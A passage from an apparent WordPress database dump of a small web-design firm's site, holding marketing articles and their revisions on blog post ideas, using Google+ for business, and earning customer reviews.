Solutions</h2>\r\nDIY suppliers and hardware stores, food retailers, clothing stores and more can use the device of the problem and solution in their blog posts.\r\n\r\n \r\n<h2>News</h2>\r\nNews can come in the form of company news, industry news or relevant local or national news. Tie it in with your company and give a link to the source if its from outside your company you never know, the link may even be reciprocated (let them know youve posted it).\r\n\r\n<img class=\"size-full wp-image-888 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/news.jpg\" alt=\"news\" width=\"500\" height=\"336\" />\r\n\r\n \r\n<h2>Posts about your own Products</h2>\r\nIf youre proud of your products, why not show them off? Especially if you have professional or artily-shot photos of them.\r\n\r\n<img class=\" wp-image-892 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/product1.jpg\" alt=\"product\" width=\"615\" height=\"272\" />\r\n\r\n \r\n<h2>Prediction</h2>\r\nSeasonal predictions are regular staples in the world of the blog. During the year, youll see a flurry of articles predicting the most popular toys for that years Christmas period, and at the beginning of the year youll be bombarded with articles on where the most-visited travel destinations will be. Try and apply this predictive thinking to your own business.\r\n\r\n<img class=\" wp-image-893 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/prediction.jpg\" alt=\"prediction\" width=\"360\" height=\"360\" />\r\n\r\n \r\n<h2>React</h2>\r\nTake a note of whats happening within your industry and write a reaction blog post referencing the latest news.\r\n\r\n<img class=\" wp-image-894 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/react.jpg\" alt=\"react\" width=\"561\" height=\"314\" />\r\n\r\n \r\n<h2>Research</h2>\r\nLook into a subject in depth and produce an interesting, detailed blog post based on the results youve seen.\r\n\r\n<img class=\"alignnone size-full wp-image-895 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/research.jpg\" alt=\"research\" width=\"500\" height=\"299\" />\r\n\r\n \r\n<h2>Testimonials</h2>\r\nIf someones written something nice about you, why not comment on it as part of a blog post? You could even turn it into a case study if your customer is willing to expand on what theyve said about your product or service.\r\n\r\n \r\n<h2>Show Examples of What Not To Do</h2>\r\nIf you think youve run out of good advice to pass onto your readers, turn it the other way round what shouldnt they be doing?\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/What-Not-To-Do.jpg\" alt=\"What Not To Do\" width=\"434\" height=\"244\" />\r\n\r\n \r\n<h2>Summary</h2>\r\nIts worth setting aside some time a month for blog post writing. The search engines love new content and so will your readers and you never know, you may even enjoy doing it!','Blogging Ideas Part 2!','','publish','closed','closed','','blogging-ideas-part-2','','','2017-10-26 08:07:15','2017-10-26 08:07:15','',0,'http://www.dogstardesign.co.uk/?page_id=9',0,'page','',0),(10,1,'2017-10-26 08:05:04','2017-10-26 08:05:04','<h2>Benefits of blogging</h2>\r\nLooking for real examples of great blog posts, Ive discovered something quite interesting. Most small businesses dont have a blog!\r\n\r\nNow, this is surprising as the statistics show that businesses who blog:\r\n<ul>\r\n <li>Attract more web traffic: businesses with blogs attract 55% more visitors than those who dont.</li>\r\n <li>Have more pages indexed by the search engines: which means a greater chance of people finding them.</li>\r\n <li>Have more fresh, relevant content: which means a greater chance of searchers coming across their website.</li>\r\n</ul>\r\nSo why not do it? Time and resources? Certainly but a small business need only publish a post once a month if they dont have time to do any more than that.\r\n<h2>Beginners Guides</h2>\r\nYoure the experts in your your field, so why not give your visitors detailed advice on whatever it is you know about? A garden centre could give information on plant care, a dentist could offer tips on looking after teeth. Use images and videos and be as specific as possible.\r\n<h3>An example of a beginners guide blog post</h3>\r\n<a href=\"https://www.coscraft.co.uk/blog/?p=206\">Guide: Beginners Armour Making</a>В В Cosplay is short for costume play and Coscraft sells the materials needed to make the costumes. Theyre an online company, but beginners guides would suit lots of different bricks and mortar stores with websites. Heres their extensive guide to making cos-safe armour.\r\n<h2>Answer a question</h2>\r\nConduct a survey, search the web, look on Quora or Yahoo Questions to find out what people are curious about.\r\n\r\nIve had a look on Yahoo and the first question Ive seen is What is the difference between a regular DVD player and a Blu Ray player?\r\n\r\nThats a great idea for a post by an electronics retailer.\r\n\r\nOr how about How do I travel from Berlin airport to our hotel? does your hotel or travel site give practical information on how to get to nearby locations?\r\n\r\n \r\n<h2><b>Checklists\r\n</b></h2>\r\nEveryone loves a list. Theyre easy to follow, dont require much time or concentration to read and can often be really useful. A good checklist, focused on a particular job and made easy to print, with checkboxes big enough so the user can tick off tasks one by one, are even more useful.\r\n\r\n \r\n<h2><b>Inspirational</b></h2>\r\nProvide inspiration in the form of a local superstar whos done something great, or perhaps someone in the past who has contributed something to your industry.\r\n\r\n \r\n<h2><b>Host an Event</b></h2>\r\nHosting an event on your premises or in a nearby venue will give you the chance to advertise yourselves, network in your local community and give you lots of content for your next blog post or two.\r\n\r\nOr host a meetup: networking events are becoming extremely popular these days and organisers need premises to host their meetings in, as well as food and drink to feed the guests with. So keep an eye out for meetings in your town and offer your services.\r\n<h2>Company News</h2>\r\nAnnounce new products, introduce members of your team (in an interesting way), or mention the prize you just won.\r\n\r\nDont go overboard with this type of blog post, however youll bore your readers to death if you do nothing but promote yourself. Using some humour wont go amiss, if youre the type of business that humour suits, that is.\r\n\r\n \r\n<h2>Beauty</h2>\r\nTheres always a place for a beautiful blog post intended to inspire. Provide ideas on how to dress yourself or dress or your home, or purely to please the viewer aesthetically.\r\n\r\n \r\n<h2>Giveaways</h2>\r\nIts hard to ignore a freebie and giving stuff away, whether its in the form of an e-book (how about an area guide from an estate agent); a cheatsheet (like the recipe cheatsheet example below); product sample (a mini chocolate bar from a chocolate retailer); or graphics and icons (if youre a graphic designer or web designer), for instance. If possible, ask for an email address in return.\r\n\r\n \r\n<h2>Comparison</h2>\r\nA comparison blog post can be used by lots of businesses sellers of kitchen implements, dog food, toilets, vehicles the list is endless. Take one of your products and compare it with at least one another, explain the differences between them and, where relevant, which is the best choice.\r\n\r\n \r\n<h2>Contests</h2>\r\nPeople love winning things, so give your regular readers a chance to win one of your own products, or a box of chocolates, or an iPad even. As well as keeping your followers involved, you may even gain new readers, so ask for an email address in return for a competition entry. Or ask for a photo or short story that you can use as content on your site.\r\n\r\n \r\n<h2>Debate</h2>\r\nDebate can provide meaty content for a blog, so keep an eye on whats causing ripples in your industry and host a discussion on it.\r\n\r\nPut across your own point of view, be sure to mention the other side of the argument and ask for your readers opinions. Healthy debate will involve your readers and give an insight into the kind of a company you really are.\r\n<h2>FAQ (Frequently Asked Questions)</h2>\r\nSimple: make a list of questions you keep hearing and turn them into a list of frequently asked questions.\r\n\r\n \r\n<h2>Open Questions to Your Readers</h2>\r\nAsk your readers what they think about a particular issue in a blog post, or post a short survey for them to complete. Or simply add the question at the end of a blog post. This will help keep them engaged and В provide you with feedback and something else to write about into the bargain.\r\n\r\n \r\n<h2>Case Studies</h2>\r\nTheres no better way to showcase your own services or products by illustrating how other people use them, and the benefits ind doing so. Alternatively, give your readers information on how a customer solved a problem when using your products/services.\r\n\r\n \r\n<h2>Event Roundups</h2>\r\nTrade events, as well as providing an opportunity for companies to promote themselves by exhibiting or networking, are a source of potential content for blog posts.\r\n\r\nPost an informative or amusing round-up of the event, and keep your readers up to date on whats happening if they cant make it. Works with pet shows, home shows, travel shows, car shows, gadget shows and the like.\r\n\r\n \r\n<h2>The Greater Good</h2>\r\nIts never a bad thing to look outside yourself or your business, so try to give something back by supporting a cause close to your heart. Of course youll benefit from the positive publicity as well, and recent research shows that customers are more likely to buy from <a href=\"http://www.thirdsector.co.uk/bulletin/third_sector_fundraising_bulletin/article/1183955/most-consumers-favour-companies-support-charities-says-study/?DCMP=EMC-CONThirdSectorFundraising\">companies who support charities</a> and local causes.\r\n\r\n \r\n<h2></h2>','Top Blog Post Ideas','','inherit','closed','closed','','8-revision-v1','','','2017-10-26 08:05:04','2017-10-26 08:05:04','',8,'http://www.dogstardesign.co.uk/8-revision-v1',0,'revision','',0),(11,1,'2017-10-26 08:07:15','2017-10-26 08:07:15','<h2>How-to/walkthrough/tutorial</h2>\r\nHow-tos are fantastically popular on the web, and whether in the form of a video, a series of images, or a detailed text posting, they can be of real value to searchers. Think about the people who might benefit from your services and the kind of thing they need to know, then put together a step-by-step post on how to do it.\r\n\r\n<img class=\"wp-image-885 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/how-to.jpg\" alt=\"how-to\" width=\"378\" height=\"288\" />Infographic\r\n\r\nGraphics are a perfect way to get concepts across in a simple way. Even though theyve become ubiquitous, theres still room for a good infographic showing original content.\r\n\r\nCreating your own infographic is best but it can be expensive to make a really good looking one that will get noticed.\r\n<h2>Community</h2>\r\nLocal businesses like restaurants, cafes, bookshops and food shops will benefit from immersing themselves into the life of the local community. Mentions of other local businesses, announcements of community events or gossip about local news can all be used in blog posts.\r\n\r\n \r\n<h2>Pick of the Week/Month</h2>\r\nRegular daily or weekly news roundups (regularity depending on your resources) will bring in some extra readers, keep you abreast of whats happening in your industry, and hopefully attract a link or two.\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/pick-of-the-week.png\" alt=\"pick of the week\" width=\"578\" height=\"258\" />Instructional\r\n\r\nDIY companies, plumbers supply shops, cosmetics retailers, furniture shops, fruit and veg shops and many, many more must surely have instructional content they can impart to casual browsers.\r\n<h2>Memes</h2>\r\nLatching on to the latest fad may not be to your taste, but it can certainly get you noticed. The search gangman style spoofs in YouTube brings up 789,000 results, so youll be swallowed up amongst the thousands doing the same thing unless you produce something quickly, making sure you understand how the meme works.\r\n<h2>Links and Resources</h2>\r\nLink to other local businesses in your area and valued clients you do business with. The important thing is that they should В be businesses you genuinely admire and think people will benefit from knowing about.\r\n\r\n \r\n<h2>Review</h2>\r\nBook reviews by a bookshops own staff, and tech and gadget reviews by customers are just two of the ways businesses can use review content for their blogs.\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/review.jpg\" alt=\"review\" width=\"540\" height=\"278\" />List\r\n\r\nTop 10s, 50s, 100s, best of, worst of, greatest, funniest, biggest, smallest: theres no end to the headlines for your list post and theres no end to the subjects you can make lists of. And these posts are really popular, with lots of shares on social media platforms for the best of them.\r\n\r\n \r\n<h2>Series</h2>\r\nA series with a theme for your blog posts will help you come up with ideas for new content, plus youll be giving your visitors an incentive to sign up for more of your blog posts to receive the rest in the series.\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/series.jpg\" alt=\"series\" width=\"360\" height=\"324\" />\r\n\r\n \r\n<h2>Problems and Solutions</h2>\r\nDIY suppliers and hardware stores, food retailers, clothing stores and more can use the device of the problem and solution in their blog posts.\r\n\r\n \r\n<h2>News</h2>\r\nNews can come in the form of company news, industry news or relevant local or national news. Tie it in with your company and give a link to the source if its from outside your company you never know, the link may even be reciprocated (let them know youve posted it).\r\n\r\n<img class=\"size-full wp-image-888 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/news.jpg\" alt=\"news\" width=\"500\" height=\"336\" />\r\n\r\n \r\n<h2>Posts about your own Products</h2>\r\nIf youre proud of your products, why not show them off? Especially if you have professional or artily-shot photos of them.\r\n\r\n<img class=\" wp-image-892 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/product1.jpg\" alt=\"product\" width=\"615\" height=\"272\" />\r\n\r\n \r\n<h2>Prediction</h2>\r\nSeasonal predictions are regular staples in the world of the blog. During the year, youll see a flurry of articles predicting the most popular toys for that years Christmas period, and at the beginning of the year youll be bombarded with articles on where the most-visited travel destinations will be. Try and apply this predictive thinking to your own business.\r\n\r\n<img class=\" wp-image-893 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/prediction.jpg\" alt=\"prediction\" width=\"360\" height=\"360\" />\r\n\r\n \r\n<h2>React</h2>\r\nTake a note of whats happening within your industry and write a reaction blog post referencing the latest news.\r\n\r\n<img class=\" wp-image-894 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/react.jpg\" alt=\"react\" width=\"561\" height=\"314\" />\r\n\r\n \r\n<h2>Research</h2>\r\nLook into a subject in depth and produce an interesting, detailed blog post based on the results youve seen.\r\n\r\n<img class=\"alignnone size-full wp-image-895 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/research.jpg\" alt=\"research\" width=\"500\" height=\"299\" />\r\n\r\n \r\n<h2>Testimonials</h2>\r\nIf someones written something nice about you, why not comment on it as part of a blog post? You could even turn it into a case study if your customer is willing to expand on what theyve said about your product or service.\r\n\r\n \r\n<h2>Show Examples of What Not To Do</h2>\r\nIf you think youve run out of good advice to pass onto your readers, turn it the other way round what shouldnt they be doing?\r\n\r\n<img class=\"aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/What-Not-To-Do.jpg\" alt=\"What Not To Do\" width=\"434\" height=\"244\" />\r\n\r\n \r\n<h2>Summary</h2>\r\nIts worth setting aside some time a month for blog post writing. The search engines love new content and so will your readers and you never know, you may even enjoy doing it!','Blogging Ideas Part 2!','','inherit','closed','closed','','9-revision-v1','','','2017-10-26 08:07:15','2017-10-26 08:07:15','',9,'http://www.dogstardesign.co.uk/9-revision-v1',0,'revision','',0),(12,1,'2017-10-26 08:12:53','2017-10-26 08:12:53','<div class=\"container-16\">\r\n<div class=\"col-12 content post\">\r\n<h2>Google+ Hangouts</h2>\r\nGoogle Talk and Google+ Messenger are all coming under the banner of Google+ Hangouts, which means that text, and video chat have become more integrated. And so will voice.\r\n\r\n \r\n\r\nGoogle Voice, Google phone service, will be integrated in the future. This coming together, and the fact that you can download the app from Google Play will make it very easy to host hangouts from your smartphone with just a few clicks.\r\n\r\nHangouts are great news for small business:\r\n<ul>\r\n <li>They\'e free.</li>\r\n <li>They\'re better than Facebook\'s offering which provides only one to one video chats via Skype Hangouts has a maximum of 10 participants.</li>\r\n <li>You can share documents, share your screen with other participants, record the videos to view and share later and broadcast them live to whoever you like.</li>\r\n <li>Business can host online press conferences, educate, announce updates to their customers and receive feedback, or just use it as a video conference for internal meetings. Livestreaming an event is another benefit.</li>\r\n <li>You can share photos and text chat live in them.</li>\r\n <li>It\'s available on desktop, mobile or tablet.</li>\r\n</ul>\r\n<h2>Google+ Layout</h2>\r\nGoogle+ is going strength to strength: it now has 190m active users. You may well have seen it already, but Google+ has a new Pinterest-style, multi-column, responsive layout that\'s been getting very positive feedback (you can revert to the old layout if you prefer).\r\n\r\nSimple and clean, it\'s much easier on the eye than the old design. Therefore it\'s easier to get your business\'s point across (with the use of photos and videos).\r\n\r\nThe new share box in the top lefthand corner makes it very easy to tell stories and hold conversations\r\n\r\n \r\n\r\na usability tip for you: if you\'ve scrolled down the page and don\'t fancy scrolling all the way to the top, click / : that brings you straight back to the share box.\r\n<h2>Google+ Related Hastags</h2>\r\nIf I click on that #SEO in the top righthand corner. I\'m told that the article in the image above also relates to #business. When I click on #business, this is what I get:\r\n\r\n \r\n\r\nWhen I click on that > I\'m given a choice of some business-related posts. Eventually, I get to\r\n\r\n \r\n\r\nMarvellous for searchability browsing within Google+ has never been particularly inspiring and this gives you lots of related content ideas.\r\n\r\nAs a business, take care to add your own hashtags (as you would on Twitter and within reason). Google will display up to three of yours, and it automatically assigns hashtags of its own to your posts.\r\n<h2>Google+ Images</h2>\r\nGoogle+ is becoming more and more image-focused: you can see this with the enormous size of your profile cover photo, and you\'ll see big images within the posts as well:\r\n\r\n \r\n\r\nIt only makes sense to post your eye-catching, hi-res professionally-taken product photos on Google+ to get noticed.\r\n\r\nAnd to make these images look their best, Google+ there now has some very handy photo-enhancing tools. I\'ll not go into them here, but you can read all about them on the official Google blog post\r\n<h2>Summary</h2>\r\nAs a business, it makes sense to be on Google+ for all sorts of reasons. And as the number of followers grows, the number of reasons grows.\r\n\r\n</div>\r\n</div>','How to Use Google+ for your Business','','publish','closed','closed','','how-to-use-google-for-your-business','','','2017-10-26 08:13:10','2017-10-26 08:13:10','',0,'http://www.dogstardesign.co.uk/?page_id=12',0,'page','',0),(14,1,'2017-10-26 08:12:53','2017-10-26 08:12:53','<div class=\"container-16\">\r\n<div class=\"col-12 content post\">\r\n<h2>Google+ Hangouts</h2>\r\nGoogle Talk and Google+ Messenger are all coming under the banner of Google+ Hangouts, which means that text, and video chat have become more integrated. And so will voice.\r\n\r\n<img class=\"size-full wp-image-593 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/05/image05.png\" alt=\"image05\" width=\"759\" height=\"520\" />\r\n\r\nGoogle Voice, Google phone service, will be integrated in the future. This coming together, and the fact that you can download the app from Google Play will make it very easy to host hangouts from your smartphone with just a few clicks.\r\n\r\nHangouts are great news for small business:\r\n<ul>\r\n <li>They\'e free.</li>\r\n <li>They\'re better than Facebook\'s offering which provides only one to one video chats via Skype Hangouts has a maximum of 10 participants.</li>\r\n <li>You can share documents, share your screen with other participants, record the videos to view and share later and broadcast them live to whoever you like.</li>\r\n <li>Business can host online press conferences, educate, announce updates to their customers and receive feedback, or just use it as a video conference for internal meetings. Livestreaming an event is another benefit.</li>\r\n <li>You can share photos and text chat live in them.</li>\r\n <li>It\'s available on desktop, mobile or tablet.</li>\r\n</ul>\r\n<h2>Google+ Layout</h2>\r\nGoogle+ is going strength to strength: it now has 190m active users. You may well have seen it already, but Google+ has a new Pinterest-style, multi-column, responsive layout that\'s been getting very positive feedback (you can revert to the old layout if you prefer).\r\n\r\nSimple and clean, it\'s much easier on the eye than the old design. Therefore it\'s easier to get your business\'s point across (with the use of photos and videos).\r\n\r\nThe new share box in the top lefthand corner makes it very easy to tell stories and hold conversations\r\n\r\n<img class=\"size-full wp-image-589 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/05/image011.png\" alt=\"image01\" width=\"597\" height=\"290\" />\r\n\r\na usability tip for you: if you\'ve scrolled down the page and don\'t fancy scrolling all the way to the top, click / : that brings you straight back to the share box.\r\n<h2>Google+ Related Hastags</h2>\r\nIf I click on that #SEO in the top righthand corner. I\'m told that the article in the image above also relates to #business. When I click on #business, this is what I get:\r\n\r\n<img class=\"size-full wp-image-590 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/05/image02.png\" alt=\"image02\" width=\"358\" height=\"514\" />\r\n\r\nWhen I click on that > I\'m given a choice of some business-related posts. Eventually, I get to\r\n\r\n<img class=\"size-full wp-image-591 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/05/image03-e1369055481749.png\" alt=\"image03\" width=\"335\" height=\"434\" />\r\n\r\nMarvellous for searchability browsing within Google+ has never been particularly inspiring and this gives you lots of related content ideas.\r\n\r\nAs a business, take care to add your own hashtags (as you would on Twitter and within reason). Google will display up to three of yours, and it automatically assigns hashtags of its own to your posts.\r\n<h2>Google+ Images</h2>\r\nGoogle+ is becoming more and more image-focused: you can see this with the enormous size of your profile cover photo, and you\'ll see big images within the posts as well:\r\n\r\n<img class=\"size-full wp-image-594 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/05/image06.png\" alt=\"image06\" width=\"737\" height=\"538\" />\r\n\r\nIt only makes sense to post your eye-catching, hi-res professionally-taken product photos on Google+ to get noticed.\r\n\r\nAnd to make these images look their best, Google+ there now has some very handy photo-enhancing tools. I\'ll not go into them here, but you can read all about them on the official Google blog post\r\n<h2>Summary</h2>\r\nAs a business, it makes sense to be on Google+ for all sorts of reasons. And as the number of followers grows, the number of reasons grows.\r\n\r\n</div>\r\n</div>','How to Use Google+ for your Business','','inherit','closed','closed','','12-revision-v1','','','2017-10-26 08:12:53','2017-10-26 08:12:53','',12,'http://www.dogstardesign.co.uk/12-revision-v1',0,'revision','',0),(15,1,'2017-10-26 08:13:10','2017-10-26 08:13:10','<div class=\"container-16\">\r\n<div class=\"col-12 content post\">\r\n<h2>Google+ Hangouts</h2>\r\nGoogle Talk and Google+ Messenger are all coming under the banner of Google+ Hangouts, which means that text, and video chat have become more integrated. And so will voice.\r\n\r\n \r\n\r\nGoogle Voice, Google phone service, will be integrated in the future. This coming together, and the fact that you can download the app from Google Play will make it very easy to host hangouts from your smartphone with just a few clicks.\r\n\r\nHangouts are great news for small business:\r\n<ul>\r\n <li>They\'e free.</li>\r\n <li>They\'re better than Facebook\'s offering which provides only one to one video chats via Skype Hangouts has a maximum of 10 participants.</li>\r\n <li>You can share documents, share your screen with other participants, record the videos to view and share later and broadcast them live to whoever you like.</li>\r\n <li>Business can host online press conferences, educate, announce updates to their customers and receive feedback, or just use it as a video conference for internal meetings. Livestreaming an event is another benefit.</li>\r\n <li>You can share photos and text chat live in them.</li>\r\n <li>It\'s available on desktop, mobile or tablet.</li>\r\n</ul>\r\n<h2>Google+ Layout</h2>\r\nGoogle+ is going strength to strength: it now has 190m active users. You may well have seen it already, but Google+ has a new Pinterest-style, multi-column, responsive layout that\'s been getting very positive feedback (you can revert to the old layout if you prefer).\r\n\r\nSimple and clean, it\'s much easier on the eye than the old design. Therefore it\'s easier to get your business\'s point across (with the use of photos and videos).\r\n\r\nThe new share box in the top lefthand corner makes it very easy to tell stories and hold conversations\r\n\r\n \r\n\r\na usability tip for you: if you\'ve scrolled down the page and don\'t fancy scrolling all the way to the top, click / : that brings you straight back to the share box.\r\n<h2>Google+ Related Hastags</h2>\r\nIf I click on that #SEO in the top righthand corner. I\'m told that the article in the image above also relates to #business. When I click on #business, this is what I get:\r\n\r\n \r\n\r\nWhen I click on that > I\'m given a choice of some business-related posts. Eventually, I get to\r\n\r\n \r\n\r\nMarvellous for searchability browsing within Google+ has never been particularly inspiring and this gives you lots of related content ideas.\r\n\r\nAs a business, take care to add your own hashtags (as you would on Twitter and within reason). Google will display up to three of yours, and it automatically assigns hashtags of its own to your posts.\r\n<h2>Google+ Images</h2>\r\nGoogle+ is becoming more and more image-focused: you can see this with the enormous size of your profile cover photo, and you\'ll see big images within the posts as well:\r\n\r\n \r\n\r\nIt only makes sense to post your eye-catching, hi-res professionally-taken product photos on Google+ to get noticed.\r\n\r\nAnd to make these images look their best, Google+ there now has some very handy photo-enhancing tools. I\'ll not go into them here, but you can read all about them on the official Google blog post\r\n<h2>Summary</h2>\r\nAs a business, it makes sense to be on Google+ for all sorts of reasons. And as the number of followers grows, the number of reasons grows.\r\n\r\n</div>\r\n</div>','How to Use Google+ for your Business','','inherit','closed','closed','','12-revision-v1','','','2017-10-26 08:13:10','2017-10-26 08:13:10','',12,'http://www.dogstardesign.co.uk/12-revision-v1',0,'revision','',0),(16,1,'2017-10-26 08:18:19','2017-10-26 08:18:19','<h2>Why do I need reviews?</h2>\r\nThe benefits of receiving online feedback are undeniable. Theyll:\r\n<ul>\r\n <li>Move you up the local search rankings in Google</li>\r\n <li>Give you a free advertising platform</li>\r\n <li>Provide you with ideas on how to improve your business</li>\r\n <li>Let you get to know your customers</li>\r\n</ul>\r\nTheyre not always the easiest things in the world to get, but theyre worth the perseverance.\r\n<h2>Review statistics</h2>\r\nWe live in a world where 72% of customers trust online reviews as much as personal recommendations and where 70% of people trust a review with a minimum of 6-10 reviews\r\n\r\nConsumer reviews are trusted 12 times as much as manufacturers own reviews, according to a survey by video review site EXPO.\r\n\r\nOur interest in reading reviews is increasing too. In 2010 58% of consumers read between 2-10 reviews: by 2012 this number had increased to 65%.\r\n<h2>How many reviews to get ranked?</h2>\r\nDavid Mihm, whos a local search expert, estimates that reviews make up 25% of Googles ranking factors, and he believes that you need at least 10 Google+ and 10 others to get you started. Research from another experienced local search consultant, Phil Rozek back in 2011 showed that 26 is a good number, and to get ranked higher in the SERPs (search engine ranking pages), youll need around one and a half times your local competitors reviews to rank higher than them (on average).\r\n\r\nThis article looks into why people leave reviews and how to get them. Read on\r\n<h2><b>Why do people leave reviews?</b></h2>\r\n<b>Altruism</b>\r\n\r\n<img class=\"size-full wp-image-814 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/226418-bizzare-animal-friendships.jpg\" alt=\"226418-bizzare-animal-friendships\" width=\"880\" height=\"473\" />\r\n\r\nAltruism or perhaps even enlightened self-interest. Reasons customers might want to leave a good review are:\r\n<ul>\r\n <li>To do good by a company thats provided a good experience.</li>\r\n <li>To help out an independent business in their local area.</li>\r\n <li>To be a good member of the online community.</li>\r\n <li>To tell readers what they would want to know themselves.</li>\r\n</ul>\r\nTherefore, ask for their help and appeal to their altruistic side. Tell them you value their feedback (because you do) and its important to you and your customers (because it is). And remember to say thanks!\r\n\r\n<b>Expectation of a reward</b>\r\n\r\nBe careful: some sites dont take kindly to providing incentives customers to give them a review as they will tend to be positive reviews. However, running a competition (see below) can increase the number of reviews you receive, and you could offer a discount on a future purchase or a heads-up on a sale in return for a review, if done carefully by email.\r\n\r\nNever, ever solicit <i>positive</i> reviews, however, as it only makes you look untrustworthy and it will quite possibly get you into trouble with Google, review sites, or even cause yourself a PR headache if someone talks about your actions online.\r\n\r\n<b>Influencing</b>\r\n\r\nSome people like the idea of being able to influence future improvements to a product or service. Be sure to prove to customers that their views will be taken on board by listening to them and importantly, engaging with them. Include these people in focus groups and use their testimonials as part of the marketing for your new product.\r\n\r\n<b>To complain</b>\r\n\r\n<img class=\"size-full wp-image-817 aligncenter\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/grrr.jpg\" alt=\"grrr\" width=\"880\" height=\"290\" />\r\n\r\nYou will inevitably have the odd dissatisfied customer, so youll need to give them an outlet for their unhappiness to prevent it getting to review stage, if at all possible. An email address, for example, or a phone number so that they can get in touch with you directly rather than make their grumbles public. Making it a rule to contact unhappy customers may even result in a negative review being amended, as well as possible future sales.\r\n\r\nBear in mind that a 2011 survey by <a href=\"http://www.conecomm.com/2011coneonlineinfluencetrendtracker\">Cone</a> found that 80% of correspondents declined to buy a product after they had read a negative review of it. Cheeringly, the same survey found that 87% of correspondents bought a product because they had read positive reviews.\r\n\r\nIt therefore makes sense to minimise the number of negative reviews by providing excellent customer service, great products and a great after-sales service, plus dealing with customer complaints before theyre forced to make it public, if at all possible. And lots of positive reviews will outweigh the importance of negative ones, which leads us on to\r\n<h2>Positive v Negative Reviews</h2>\r\nFor those who have cringed at the thought of having their restaurant or hotel pulled apart on TripAdvisor, there is hope: a huge number, 90 million reviews from 65 review sites, were analysed by ReviewPro to discover the percentage of reviews that were grumbles, glowing, or just meh. The results are interesting and show that people dont turn to a review site simply to communicate their dissatisfaction:\r\n\r\n<img class=\"alignnone size-full wp-image-837\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/reviews1.png\" alt=\"reviews\" width=\"880\" height=\"355\" />\r\n\r\n<strong>В Positive</strong> 60%, <strong>Neutral </strong>28%, <strong>Negative</strong>“ 12%\r\n\r\n<a href=\"http://www.tnooz.com/2011/07/15/news/over-90-million-travel-reviews-tested-60-percent-found-to-be-positive\">ReviewPro said</a>:В The need to monitor the social web for damaging content remains, but ReviewPros research proves <b>most people go online to share positive experiences</b>.\r\n\r\nSo, to attract real reviews that people and algorithms are going to approve of, concentrate on improving your services to attract positive real ones, rather than clearing out the bad ones or faking them altogether even if you know others are doing it.\r\n<h2>Respond to reviews</h2>\r\nResponding gives you the opportunity to thank positive reviewers, be seen to care about what your customers are saying about you, and it shows that youre willing to listen to and try to deal with customers issues.\r\n\r\nTake a deep breath and reply diplomatically even if you think the review is unfair: it may well reap rewards and other people will be encourage to review you positively as well.\r\n<h2>Reward Loyalty</h2>\r\nContact your loyal customers to thank them for their reviews. Paying attention to your faithful taskforce will mean that theyll be better inclined to review other products for you. Try offering a reviewer of the month prize draw and you might encourage them to review you on further sites or give you more product reviews.\r\n\r\n \r\n\r\n<b>Google+</b>\r\n\r\nUsers cant leave reviews on Google+ anonymously: they have to specifically have a Google+ account. This adds an element of trustworthiness to the reviews but isnt a quick and easy way for non-Google+ account holders to leave a review.\r\n\r\nUnfortunately, these reviews are worth getting as you saw at the beginning of this article, so find out how visitors found you, and if it was on Google+ Local, ask them nicely.\r\n<h2>Email</h2>\r\n<img class=\"alignnone size-full wp-image-833\" src=\"file:///C:/Users/Vanilla%20Circus/Desktop/Dead%20Sites/wp-content/uploads/2013/06/beg.jpg\" alt=\"beg\" width=\"880\" height=\"355\" />\r\n\r\nYoull need your prospective reviewers email addresses if you want to ask for their reviews by email.\r\n\r\nIts not terribly easy for bricks and mortar shops to get customers addresses in the first place, but there are ways and means:\r\n<ul>\r\n <li>Leave a form beside the till that asks your customer to Sign up for our email list. Make sure you let them know that its confidential and that you wont sell on their email addresses.</li>\r\n <li>Offer a small incentive: Hotel Chocolat give their customers a small bar of chocolates if they leave their addresses. Or enter them into a draw for a prize.</li>\r\n <li>Have a fishbowl on the counter that they can put their business cards into.</li>\r\n <li>Provide a comment card with the bill or keep them beside the cash registers. As well as collating very useful customer feedback and testimonials, its an outlet for customers to vent 